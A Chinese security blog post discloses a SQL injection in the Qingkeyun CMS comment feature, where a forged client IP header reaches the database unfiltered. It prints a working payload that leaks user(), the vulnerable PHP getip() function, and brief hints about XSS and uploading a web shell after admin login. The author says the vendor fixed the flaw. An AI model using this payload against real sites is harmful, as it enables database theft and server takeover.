青客云sql注入漏洞第二发

本文出自红客联盟 太极实验室(ihonker.org)

这次不是延时注入,问题是出现在评论时获取ip处,
在发表评论的时候,发现,ip可以伪造,并且被带入到feedback数据库里面,一枚完美的注入产生了,在发表评论的时候,ip伪造下

8.8.8.8\",'IANA',user(),'','1463286558','0','','0')#

213154iznzm7swjjsmshfj
内容随便写,爆出了user()
其中1463286558表示的是时间
213218vudyr1cn2121ryev
其中获取ip的函数

function getip(){
if(!empty($_SERVER["HTTP_CLIENT_IP"]))$cip = $_SERVER["HTTP_CLIENT_IP"];
else if(!empty($_SERVER["HTTP_X_FORWARDED_FOR"]))$cip = $_SERVER["HTTP_X_FORWARDED_FOR"];
else if(!empty($_SERVER["REMOTE_ADDR"]))$cip = $_SERVER["REMOTE_ADDR"];
else $cip = "127.0.0.1";
return $cip;
}

过滤代码忘了在哪了,官网测试一下
213304vtery7ff2yybwrxf
当然内容和其他字段也是可以控制的,所以也可以xss,其他的拿登陆之类的操作,全是用json数据反馈,登陆后台之后可以直接上传拿shell,其他自己发挥想象吧。
忘了说一句,漏洞我已经联系客服修复了。

本文固定链接: https://www.unhonker.com/bug/1937.html | 90' s Blog|关注网络信息安全

该日志由 unhonker 于2016年06月07日发表在 漏洞公布 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: 青客云sql注入漏洞第二发 | 90' s Blog|关注网络信息安全
关键字:

青客云sql注入漏洞第二发:等您坐沙发呢!

发表评论

您必须 [ 登录 ] 才能发表留言!